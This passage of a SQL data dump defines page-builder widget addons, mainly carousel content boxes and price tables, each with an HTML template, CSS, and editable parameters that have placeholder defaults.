(39, 'Overlay Hover Content', 'uc_overlay_hover_carousel_content_vc', 'uc_overlay_hover_carousel_content', 'vc', '', 39, '{"html":"<div class=\\"uc_overlay_hover_content\\">\\n        <div class=\\"uc_overlay_hover_content_container_holder\\">\\n            <div class=\\"uc_overlay_hover_content_placeholder\\" style=\\"background:{{bg_color}};\\">\\n                <img src=\\"{{image}}\\" alt=\\"\\">\\n            <\\/div>            \\n            <div class=\\"uc_overlay_hover_content_content\\">\\n                <div class=\\"uc_elegant_content_box\\">\\n                    <h2 style=\\"color:{{primary_color}};\\">{{title|raw}}<\\/h2>\\n                    <div class=\\"uc_paragraph\\" style=\\"color:{{primary_color}};\\">\\n                        {{content|raw}}\\n                    <\\/div>\\n                    <div class=\\"uc_more_btn\\">\\n                        <a class=\\"uc_more_btn\\" style=\\"background:{{primary_color}}; color:{{btn_color}};\\" href=\\"{{link}}\\">{{btn_text|raw}}<\\/a>\\n                    <\\/div>\\n                <\\/div>\\n            <\\/div>\\n        <\\/div>\\n   <\\/div>"}', '{"options":{"enable_items":"false","path_assets":"uc_overlay_hover_carousel_content","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_colorpicker","title":"Background Color","name":"bg_color","description":"","default_value":"#1d2d3a"},{"type":"uc_image","title":"Image","name":"image","description":"","add_thumb":"false","add_thumb_large":"false","default_value":"[url_assets]\\/0111.jpg"},{"type":"uc_colorpicker","title":"Primary Color","name":"primary_color","description":"","default_value":"#ffffff"},{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"false","default_value":"Default Title","font_editable":"true"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, conse ctetur adipisicing elit, sed do eiusmod tempor incid idunt ut","font_editable":"true"},{"type":"uc_textfield","title":"Button text","name":"btn_text","description":"","admin_label":"false","default_value":"Learn More","font_editable":"true"},{"type":"uc_colorpicker","title":"Button Color","name":"btn_color","description":"","default_value":"#0e0e0e"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"#"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Droid+Serif:400,700|Open+Sans:400,600","condition":""},{"url":"uc_overlay_hover_carousel_content\\/uc_overlay_hover_carousel_content.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(40, 'Side Content', 'uc_side_carousel_content_vc', 'uc_side_carousel_content', 'vc', '', 40, '{"html":"<div class=\\"uc_side_content\\">\\n       <div class=\\"uc_side_content_container_holder\\" style=\\"background:{{bg_color}};\\">\\n                <div class=\\"uc_side_content_placeholder\\">\\n                    <img src=\\"{{image}}\\" alt=\\"\\">\\n                <\\/div>\\n                <div class=\\"uc_side_content_content\\" style=\\"background:{{bg_color}};\\">\\n                    <div class=\\"uc_side_content_box\\">\\n                        <h2 style=\\"color:{{primary_color}};\\">{{title|raw}}<\\/h2>\\n                        <div class=\\"uc_paragraph\\" style=\\"color:{{secondary_color}};\\">{{content|raw}}<\\/div>\\n                        <a class=\\"uc_more_btn\\" style=\\"color:{{primary_color}};\\" href=\\"{{link}}\\">{{btn_text|raw}}<\\/a>\\n                    <\\/div>\\n                <\\/div>\\n            <\\/div>\\t\\n   <\\/div>"}', '{"options":{"enable_items":"false","path_assets":"uc_side_carousel_content","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_colorpicker","title":"Background Color","name":"bg_color","description":"","default_value":"#ffffff"},{"type":"uc_image","title":"Image","name":"image","description":"","add_thumb":"false","add_thumb_large":"false","default_value":"[url_assets]\\/img2.jpg"},{"type":"uc_colorpicker","title":"Primary Color","name":"primary_color","description":"","default_value":"#343434"},{"type":"uc_colorpicker","title":"Secondary Color","name":"secondary_color","description":"","default_value":"#838383"},{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"false","default_value":"Default Title","font_editable":"true"},{"type":"uc_textarea","title":"Content ","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consectetur adipisi cing elit, sed do eius mod tempor incididunt ut ","font_editable":"true"},{"type":"uc_textfield","title":"Button Text","name":"btn_text","description":"","admin_label":"false","default_value":"Learn More","font_editable":"true"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"#"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:300,400,600,700","condition":""},{"url":"uc_side_carousel_content\\/uc_side_carousel_content.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(41, 'Solid Side Content', 'uc_solid_side_carousel_content_vc', 'uc_solid_side_carousel_content', 'vc', '', 41, '{"html":"<div class=\\"uc_solid_side_content\\">\\n            <div class=\\"uc_solid_side_content_container_holder\\" style=\\"background:{{bg_color}};\\">\\n                <div class=\\"uc_solid_side_content_placeholder\\">\\n                    <img src=\\"{{image}}\\" alt=\\"\\">\\n                <\\/div>\\n                <div class=\\"uc_solid_side_content_content\\">\\n                    <div class=\\"uc_side_content_box\\">\\n                        <h2 style=\\"color:{{primary_color}};\\">{{title|raw}}<\\/h2>\\n                        <div class=\\"uc_paragraph\\" style=\\"color:{{primary_color}};\\">{{content|raw}}<\\/div>\\n                        <a class=\\"uc_more_btn\\" style=\\"color:{{primary_color}}; border-color:{{primary_color}};\\" href=\\"{{link}}\\">{{btn_text|raw}}<\\/a>\\n                    <\\/div>\\n                <\\/div>\\n            <\\/div>\\t\\n   <\\/div>"}', '{"options":{"enable_items":"false","path_assets":"uc_solid_side_carousel_content","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title","font_editable":"true"},{"type":"uc_colorpicker","title":"Background Color","name":"bg_color","description":"","default_value":"#ae90fa"},{"type":"uc_image","title":"Image","name":"image","description":"","add_thumb":"false","add_thumb_large":"false","default_value":"[url_assets]\\/img1.jpg"},{"type":"uc_colorpicker","title":"Primary Color","name":"primary_color","description":"","default_value":"#ffffff"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consectetur adipisi cing elit, sed do eius mod tempor incididunt ut ","font_editable":"true"},{"type":"uc_textfield","title":"Button Text","name":"btn_text","description":"","admin_label":"false","default_value":"Learn More","font_editable":"true"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"#"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:300,400,600,700","condition":""},{"url":"uc_solid_side_carousel_content\\/uc_solid_side_carousel_content.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(42, 'Very Clean Content', 'uc_very_clean_carousel_content_vc', 'uc_very_clean_carousel_content', 'vc', '', 42, '{"html":"<div class=\\"uc_very_clean_content\\">\\n            <div class=\\"uc_very_clean_content_container_holder\\">\\n                <div class=\\"uc_very_clean_content_content\\" style=\\"background:{{bg_color}};\\">\\n                \\t<span style=\\"color:{{primary_color}}; class=\\"bbb\\"\\"><i class=\\"{{icon}}\\" aria-hidden=\\"true\\"><\\/i><\\/span>\\n                    <h2 style=\\"color:{{primary_color}};\\">{{title|raw}}<\\/h2>\\n                    <div class=\\"uc_paragraph\\" style=\\"color:{{primary_color}};\\">{{content|raw}}<\\/div>\\n                    <a class=\\"uc_more_btn\\" style=\\"color:{{primary_color}};\\" href=\\"{{link}}\\">{{btn_text|raw}}<\\/a>\\n                <\\/div>\\n            <\\/div>\\n   <\\/div>"}', '{"options":{"enable_items":"false","path_assets":"uc_very_clean_carousel_content","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title","font_editable":"false"},{"type":"uc_colorpicker","title":"Background Color","name":"bg_color","description":"","default_value":"#f4f6fa"},{"type":"uc_colorpicker","title":"Primary Color","name":"primary_color","description":"","default_value":"#838383"},{"type":"uc_icon","title":"Icon","name":"icon","description":"","admin_label":"false","default_value":"fa fa-clock-o"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, conse ctetur adipisicing elit, sed do eiusmod tempor incid idunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco.","font_editable":"true"},{"type":"uc_textfield","title":"Button Text","name":"btn_text","description":"","admin_label":"false","default_value":"Learn More","font_editable":"true"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"#"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"uc_very_clean_carousel_content\\/uc_very_clean_carousel_content.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Droid+Serif:700,700i|Open+Sans:400,600,700","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(43, 'White Content', 'uc_white_carousel_content_vc', 'uc_white_carousel_content', 'vc', '', 43, '{"html":"<div class=\\"uc_white_content\\">\\n  <div class=\\"uc_white_content_container_holder\\" style=\\"border-color:{{primary_color}};\\">\\n    <div class=\\"uc_white_content_placeholder\\">\\n      <img src=\\"{{image}}\\" alt=\\"\\">\\n    <\\/div>\\n    <div class=\\"uc_white_content_content\\" style=\\"background:{{primary_color}};\\">\\n      <h2 style=\\"color:{{title_color}};\\">{{title|raw}}<\\/h2>\\n      <p style=\\"color:{{content_color}};\\">{{content|raw}}<\\/p>\\n      <a class=\\"uc_more_btn\\" style=\\"color:{{primary_color}}; background:{{btn_bg}};\\" href=\\"{{link}}\\">{{btn_text|raw}}<\\/a>\\n    <\\/div>\\n  <\\/div>\\t\\n<\\/div>"}', '{"options":{"enable_items":"false","path_assets":"uc_white_carousel_content","description":"","link_resource":"","show_small_icon":"true","preview_size_unite_selected_text":"Full Size","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff","is_free_addon":"false"},"params":[{"type":"uc_textfield","title":"Title","name":"title","description":"","admin_label":"true","default_value":"Default Title goes here","font_editable":"true"},{"type":"uc_colorpicker","title":"Primary Color","name":"primary_color","description":"","default_value":"#ffffff"},{"type":"uc_image","title":"Image","name":"image","description":"","add_thumb":"false","add_thumb_large":"false","default_value":"[url_assets]\\/img2.jpg"},{"type":"uc_colorpicker","title":"Title Color","name":"title_color","description":"","default_value":"#343434"},{"type":"uc_textarea","title":"Content","name":"content","description":"","admin_label":"false","default_value":"Lorem ipsum dolor sit amet, consectetur adipisi cing elit, sed do eius mod tempor incididunt ut ","font_editable":"true"},{"type":"uc_colorpicker","title":"Content Color","name":"content_color","description":"","default_value":"#838383"},{"type":"uc_textfield","title":"Button Text","name":"btn_text","description":"","admin_label":"false","default_value":"Learn More","font_editable":"true"},{"type":"uc_colorpicker","title":"Button background","name":"btn_bg","description":"","default_value":"#51cfee"},{"type":"uc_textfield","title":"Link","name":"link","description":"","default_value":"#"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:300,400,600,700","condition":""},{"url":"uc_white_carousel_content\\/uc_white_carousel_content.css","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(44, 'Alternating Price Table', 'alternating_price_table_vc', 'alternating_price_table', 'vc', '', 44, '{"html":"<div class=\\"uc_alternating_price_table\\" >\\n    \\t<div class=\\"uc_content_box\\">\\t\\t\\t\\t\\n            <div class=\\"uc_pricing_grid\\">\\n                <div class=\\"uc_price_value\\" style=\\"border-color:{{price_table_top_border}};\\">\\n                    <h3><a href=\\"#\\" style=\\"color:{{title_color}};\\">{{title_text}}<\\/a><\\/h3>\\n                    <h5><span style=\\"color:{{price_color}};\\">{{price}}<\\/span><lable style=\\"color:{{month_caption_color}};\\">{{month_caption}}<\\/lable><\\/h5>\\n                    <div class=\\"uc_sale_box\\">\\n                        <span class=\\"uc_on_sale\\" style=\\"background-color:{{tag_background_color}};  color:{{tag_text_color}};\\">{{tag_text}}<\\/span>\\n                    <\\/div>\\n                <\\/div>\\n                <div class=\\"uc_price_bg\\">\\n                    <ul>\\n                        <li><a href=\\"#\\">{{list_content_text_one}}<\\/a><\\/li>\\n                        <li><a href=\\"#\\">{{list_content_text_two}}<\\/a><\\/li>\\n                        <li><a href=\\"#\\">{{list_content_text_three}}<\\/a><\\/li>\\n                        <li><a href=\\"#\\">{{list_content_text_four}}<\\/a><\\/li>\\n                        <li><a href=\\"#\\">{{list_content_text_five}}<\\/a><\\/li>\\n                    <\\/ul>\\n                    <div class=\\"uc_btn\\">\\n                        <a style=\\"background-color:{{button_background_color}};\\"  href=\\"{{button_link}}\\">{{button_text}}<\\/a>\\n                    <\\/div>\\n                <\\/div>\\n            <\\/div>\\n        <\\/div>\\n    <\\/div>","css":".uc_alternating_price_table .uc_price_value h5 lable {\\n    color: {{month_caption_color}};\\n}\\n\\n.uc_alternating_price_table .uc_price_value h5 span {\\n    color: {{price_color}};\\n}\\n\\n.uc_alternating_price_table .uc_pricing_grid ul li:nth-child(2n+1) a {\\n    background: {{list_background_color}};\\n}\\n\\n.uc_alternating_price_table .uc_pricing_grid ul li a {\\n    color: {{list_content_color}};\\n}\\n\\n.uc_alternating_price_table .uc_btn a\\n{\\n\\tbackground: {{button_background_color}};\\n}\\n\\n.uc_alternating_price_table .uc_btn\\n{\\n\\tborder-bottom: 2px solid;\\n    border-color:{{boder_bottom_color}};\\n}\\n\\n.uc_alternating_price_table .uc_pricing_grid:hover div.uc_price_bg ul li a, .uc_alternating_price_table .uc_pricing_grid:hover div.uc_price_value h3 a{\\n \\tcolor:{{table_hover_color}} !important;\\n}"}', '{"options":{"path_assets":"alternating_price_table","description":"","link_resource":"","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff"},"params":[{"type":"uc_colorpicker","title":"Price Table Top Border","name":"price_table_top_border","description":"","default_value":"#fd6e70"},{"type":"uc_textfield","title":"Title Text","name":"title_text","description":"","default_value":"STANDARD"},{"type":"uc_colorpicker","title":"Title Color","name":"title_color","description":"","default_value":"#ffffff"},{"type":"uc_textfield","title":"Price","name":"price","description":"","default_value":"$ 29.99"},{"type":"uc_colorpicker","title":"Price Color","name":"price_color","description":"","default_value":"#fe6d72"},{"type":"uc_textfield","title":"Month Caption","name":"month_caption","description":"","default_value":"\\/ month"},{"type":"uc_colorpicker","title":"Month Caption Color","name":"month_caption_color","description":"","default_value":"#8c8c94"},{"type":"uc_colorpicker","title":"List Background Color  ","name":"list_background_color","description":"","default_value":"#f4f4f4"},{"type":"uc_colorpicker","title":"List Content Color","name":"list_content_color","description":"","default_value":"#c7c4c4"},{"type":"uc_textfield","title":"List Content Text One","name":"list_content_text_one","description":"","default_value":"10GB Disk Space "},{"type":"uc_textfield","title":"List Content Text Two","name":"list_content_text_two","description":"","default_value":"20 Domain Names"},{"type":"uc_textfield","title":"List Content Text Three","name":"list_content_text_three","description":"","default_value":"10 E-Mail Address"},{"type":"uc_textfield","title":"List Content Text Four","name":"list_content_text_four","description":"","default_value":"100GB Monthly Bandwidth "},{"type":"uc_textfield","title":"List Content Text Five","name":"list_content_text_five","description":"","default_value":"Fully Support"},{"type":"uc_textfield","title":"Button Text","name":"button_text","description":"","default_value":"Purchase"},{"type":"uc_colorpicker","title":"Button Background Color","name":"button_background_color","description":"","default_value":"#fa6e6f"},{"type":"uc_textfield","title":"Tag Text","name":"tag_text","description":"","default_value":"New"},{"type":"uc_colorpicker","title":"Tag Background Color","name":"tag_background_color","description":"","default_value":"#fa6e6f"},{"type":"uc_colorpicker","title":"Boder Bottom Color","name":"boder_bottom_color","description":"","default_value":"#f96d70"},{"type":"uc_textfield","title":"Button Link","name":"button_link","description":"","default_value":"http:\\/\\/google.com\\/"},{"type":"uc_colorpicker","title":"Tag Text Color","name":"tag_text_color","description":"","default_value":"#444444"},{"type":"uc_colorpicker","title":"Table Hover Color","name":"table_hover_color","description":"","default_value":"#fa6e6f"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"alternating_price_table\\/alternating_price_table.css","condition":""},{"url":"http:\\/\\/fonts.googleapis.com\\/css?family=Lato:100,300,400,700,900,100italic,300italic,400italic,700italic","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(45, 'Bold Color Price Table', 'bold_color_price_table_vc', 'bold_color_price_table', 'vc', '', 45, '{"html":"<div class=\\"uc_bold_color_price_table\\">\\n\\t\\t<div class=\\"uc_content_box\\">\\n\\t\\t\\t<div class=\\"uc_title_head\\" style=\\"background-color:{{top_background_color}}; color:{{top_text_color}};\\">\\n            \\t<h3>{{plan_name}}<\\/h3>\\n                <h6>{{plan_type}}<\\/h6>\\n                <p><strong>{{price}}<\\/strong><\\/p>\\n            <\\/div>\\n            <div class=\\"uc_content\\">\\n            \\t<ul>\\n                \\t<li>{{list_content_one}}<\\/li>\\n                    <li>{{list_content_two}}<\\/li>\\n                    <li>{{list_content_three}}<\\/li>\\n                    <li>{{list_content_four}}<\\/li>\\n                    <li>{{list_content_five}}<\\/li>\\n                <\\/ul>\\n                <a href=\\"{{button_link}}\\" style=\\"background-color:{{button_background}}; border:1px solid;\\n\\tborder-color:{{button_border_color}};\\" class=\\"uc_btn\\">{{button_text}}<\\/a>\\n            <\\/div>\\n        <\\/div>\\n    <\\/div>","css":".uc_bold_color_price_table .uc_content_box{\\n\\tborder-bottom:3px solid;\\n\\tborder-color:{{bottom_border}};\\n}"}', '{"options":{"enable_items":"false","path_assets":"bold_color_price_table","description":"","link_resource":"","show_small_icon":"true","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff"},"params":[{"type":"uc_colorpicker","title":"Top Background Color","name":"top_background_color","description":"","default_value":"#ff3366"},{"type":"uc_colorpicker","title":"Top Text Color","name":"top_text_color","description":"","default_value":"#ffffff"},{"type":"uc_textfield","title":"Plan Name","name":"plan_name","description":"","default_value":"Silver"},{"type":"uc_textfield","title":"Plan Type","name":"plan_type","description":"","default_value":"Sponsorship"},{"type":"uc_textfield","title":"Price","name":"price","description":"","default_value":"$3000"},{"type":"uc_textfield","title":"List Content One","name":"list_content_one","description":"","default_value":"Welcome Reception"},{"type":"uc_textfield","title":"List Content Two","name":"list_content_two","description":"","default_value":"President\\u2019s Reception"},{"type":"uc_textfield","title":"List Content Three","name":"list_content_three","description":"","default_value":"Welcome Gift"},{"type":"uc_textfield","title":"List Content Four","name":"list_content_four","description":"","default_value":"Conference Bag"},{"type":"uc_textfield","title":"List Content Five","name":"list_content_five","description":"","default_value":"Attendee''s welcome gift"},{"type":"uc_textfield","title":"Button Text","name":"button_text","description":"","default_value":"Read More"},{"type":"uc_textfield","title":"Button Link","name":"button_link","description":"","default_value":"http:\\/\\/google.com\\/"},{"type":"uc_colorpicker","title":"Button Background","name":"button_background","description":"","default_value":"#ff3366"},{"type":"uc_colorpicker","title":"Button Hover Color","name":"button_hover_color","description":"","default_value":"#e63360"},{"type":"uc_colorpicker","title":"Bottom Border","name":"bottom_border","description":"","default_value":"#ff3366"},{"type":"uc_colorpicker","title":"Button Border Color","name":"button_border_color","description":"","default_value":"#e63360"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"bold_color_price_table\\/bold_color_price_table.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Sintony:400,700","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Play:400,700","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(46, 'Bold Simple Price Table', 'bold_simple_price_table_vc', 'bold_simple_price_table', 'vc', '', 46, '{"html":"<div class=\\"uc_bold_simple_price_table\\">\\n\\t\\t<div class=\\"uc_content_box\\">\\n\\t\\t\\t<div class=\\"uc_price\\">{{price}}<\\/div>\\n            <h6>{{work_type}}<\\/h6>\\n            <div class=\\"uc_desc\\">{{content}}<\\/div>\\n            <a href=\\"{{button_link}}\\" class=\\"uc_btn\\">{{button_text}}<\\/a>\\n        <\\/div>\\n    <\\/div>","css":".uc_bold_simple_price_table .uc_content_box a.uc_btn {\\n    border: 2px solid #999999 !important;\\n    color: #999999 !important;\\n}\\n\\n.uc_bold_simple_price_table .uc_content_box a.uc_btn:hover {\\n    border: 2px solid #000000 !important;\\n    color:#000000 !important;\\n}"}', '{"options":{"enable_items":"false","path_assets":"bold_simple_price_table","description":"","link_resource":"","show_small_icon":"true","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff"},"params":[{"type":"uc_textfield","title":"Price","name":"price","description":"","default_value":"19"},{"type":"uc_textfield","title":"Work Type","name":"work_type","description":"","default_value":"Freelance"},{"type":"uc_textfield","title":"Content","name":"content","description":"","default_value":"A commercial-use licence that comes with the addition of 6 months free support."},{"type":"uc_textfield","title":"Button Text","name":"button_text","description":"","default_value":"Purchase Now"},{"type":"uc_textfield","title":"Button Link","name":"button_link","description":"","default_value":"https:\\/\\/www.google.com"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":["font-awsome"],"css":[{"url":"bold_simple_price_table\\/bold_simple_price_table.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Lora","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Montserrat:400,700","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(47, 'Clean Price Table', 'clean_price_table_vc', 'clean_price_table', 'vc', '', 47, '{"html":"<div class=\\"uc_clean_price_table\\">\\n\\t<div class=\\"uc_price_chart\\">\\n    <div class=\\"uc_popular\\">\\n    \\t<h2>{{subscription_title}}<\\/h2>\\n        <hr><\\/hr>\\n    <\\/div>\\n        <div class=\\"uc_price\\">\\n        \\t<span>{{subscription_price}}<em>{{subscription_price_tag}}<\\/em><\\/span>\\n        <\\/div>\\n        <div class=\\"uc_facility\\">\\n        \\t<span><strong>{{storage_unit}}<\\/strong>{{storage_unit_tag}}<\\/span>\\n            <span><strong>{{emails_package}}<\\/strong>{{emails_package_tag}}<\\/span>\\n            <span><strong>{{domains_quantity}}<\\/strong>{{domains_quantity_tag}}<\\/span>\\n            <span><strong>{{email_addresses_package}}<\\/strong>{{email_addresses_package_tag}}<\\/span>\\n        <\\/div>\\n        <div class=\\"uc_button\\">\\n        \\t<a href=\\"#\\">{{button}}<\\/a>\\n        <\\/div>\\n    <\\/div>\\n<\\/div>","css":".uc_clean_price_table .uc_button a:hover\\n{\\n  color:#999;\\n}\\n\\n.uc_clean_price_table .uc_price_chart\\n{\\n  background-color:#ffffff;\\n}"}', '{"options":{"enable_items":"false","path_assets":"clean_price_table","description":"","link_resource":"","show_small_icon":"true","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff"},"params":[{"type":"uc_textfield","title":"Subscription Title","name":"subscription_title","description":"","default_value":"Standard"},{"type":"uc_textfield","title":"Subscription Price","name":"subscription_price","description":"","default_value":"$19.99\\/"},{"type":"uc_textfield","title":"Subscription Price Tag","name":"subscription_price_tag","description":"","default_value":"per month"},{"type":"uc_textfield","title":"Storage Unit","name":"storage_unit","description":"","default_value":"20GB"},{"type":"uc_textfield","title":"Storage Unit Tag","name":"storage_unit_tag","description":"","default_value":"of Storage"},{"type":"uc_textfield","title":"Emails Package","name":"emails_package","description":"","default_value":"Full"},{"type":"uc_textfield","title":"Emails Package Tag","name":"emails_package_tag","description":"","default_value":"Email Support"},{"type":"uc_textfield","title":"Domains quantity","name":"domains_quantity","description":"","default_value":"5"},{"type":"uc_textfield","title":"Domains Quantity Tag","name":"domains_quantity_tag","description":"","default_value":"Domains"},{"type":"uc_textfield","title":"Email Addresses Package","name":"email_addresses_package","description":"","default_value":"20"},{"type":"uc_textfield","title":"Email Addresses Package Tag","name":"email_addresses_package_tag","description":"","default_value":"Email Addresses"},{"type":"uc_textfield","title":"Button","name":"button","description":"","default_value":"Sign Up"}],"params_items":[{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"","limited_edit":"true"}],"includes":{"js":[],"jslib":[],"css":[{"url":"clean_price_table\\/clean_price_table.css","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Roboto:400,100,100italic,300,700,500italic,500,400italic,900italic,900,700italic","condition":""},{"url":"https:\\/\\/fonts.googleapis.com\\/css?family=Merriweather:400,700|Raleway","condition":""}]},"variables_item":"","variables_main":""}', 1, 1, NULL, NULL, NULL),
(48, 'Custom Price Table', 'custom_price_table_vc', 'custom_price_table', 'vc', '', 48, '{"html":"<div class=\\"uc_custom_price_table\\">\\n\\t\\t<div class=\\"uc_content_box\\">\\n          \\t\\n        \\t<div class=\\"uc_price_table\\" style=\\"border-color:{{table_border_color}};\\">\\n              <i class=\\"uc_mark_holder\\" style=\\"border-color:{{icon_background_color}} transparent transparent;\\"><\\/i>\\n            \\t<h2>{{title}}<\\/h2>\\n                <small>{{price}}{{month_caption}}<\\/small>\\n                <span>{{validity}}<\\/span>\\n                \\t<ul>\\n                      <li>\\n                        <strong>{{list_content_one_bold}}<\\/strong> {{list_content_one}}\\n                      <\\/li>\\n                      <li>\\n                        <strong>{{list_content_two_bold}}<\\/strong> {{list_content_two}}\\n                      <\\/li>\\n                      <li>\\n                         <strong>{{list_content_three_bold}}<\\/strong> {{list_content_three}}\\n                      <\\/li>\\n                      <li>\\n                        {{list_content_four}}\\n                      <\\/li>\\n                      <li>\\n                        {{list_content_five}}\\n                      <\\/li>\\n    \\t\\t\\t\\t<\\/ul>\\n            <\\/div>\\n        <\\/div>\\n    <\\/div>","css":".uc_custom_price_table .uc_content_box\\n{\\n\\tbackground-color:{{table_background_color}};\\n\\tborder-radius: 10px;\\n  \\n}\\n.uc_custom_price_table .uc_content_box .uc_price_table{overflow:hidden;}\\n.uc_custom_price_table .uc_content_box .uc_price_table i.uc_mark_holder\\n{\\n  \\n\\tborder-color: {{icon_background_color}} transparent transparent;\\n\\tbackground-color:{{table_background_color}};\\n\\tborder-radius:0!important;\\t\\n\\tborder-style: solid;\\n\\tborder-width: 64px 64px 0 0;\\n\\tcontent: \\"\\";\\n\\theight: 0;\\n\\tleft:0px;\\n\\tposition: absolute;\\n\\ttop: 0;\\n\\twidth: 0;\\n}\\n\\n.uc_custom_price_table .uc_content_box .uc_price_table h2{ position:relative; z-index:999;}"}', '{"options":{"enable_items":"false","path_assets":"custom_price_table","description":"","link_resource":"","show_small_icon":"true","preview_size":"full","preview_custom_width":"","preview_bgcol":"#ffffff"},"params":[{"type":"uc_colorpicker","title":"Table Background Color","name":"table_background_color","description":"","default_value":"#ffffff"},{"type":"uc_colorpicker","title":"Table Border Color","name":"table_border_color","description":"","default_value":"#3bc6b8"},{"type":"uc_textfield","title":"Icon","name":"icon","description":"","default_value":"."},{"type":"uc_colorpicker","title":"Icon Background Color","name":"icon_background_color","description":"","default_value":"#3bc6b8"},{"type":"uc_textfield","title":"Title","name":"title","description":"","default_value":"Brilliant"},{"type":"uc_textfield","title":"Price","name":"price","description":"","default_value":"\\u20ac5"},{"type":"uc_textfield","title":"Month Caption","name":"month_caption","description":"","default_value":"\\/Available for a month"},{"type":"uc_textfield","title":"Validity","name":"validity","description":"","default_value":"Free 30 day trial"},{"type":"uc_colorpicker","title":"Validity Color","name":"validity_color","description":"","default_value":"#33c4b6"},{"type":"uc_colorpicker","title":"List Icon Color","name":"list_icon_color","description":"","default_value":"#33c4b6"},{"type":"uc_textfield","title":"List Content One Bold","name":"list_content_one_bold","description":"","default_value":"Unlimited "},{"type":"uc_textfield","title":"List Content One","name":"list_content_one","description":"","default_value":"team members "},{"type":"uc_textfield","title":"List Content Two Bold","name":"list_content_two_bold","description":"","default_value":"Unlimited"},{"type":"uc_textfield","title":"List Content Two","name":"list_content_two","description":"","default_value":"team playlists "},{"type":"uc_textfield","title":"List Content Three Bold","name":"list_content_three_bold","description":"","default_value":"Unlimited"},{"type":"uc_textfield","title":"list_content_three","name":"list_content_three","description":"","default_value":"public playlists "},{"type":"uc_textfield","title":"List Content Four","name":"list_content_four","description":"","default_value":"Team analytics "},{"type":"uc_textfield","title":"List Content Five","name":"list_content_five","description":"","default_value":"Send files "},{"type":"uc_colorpicker","title":"Icon 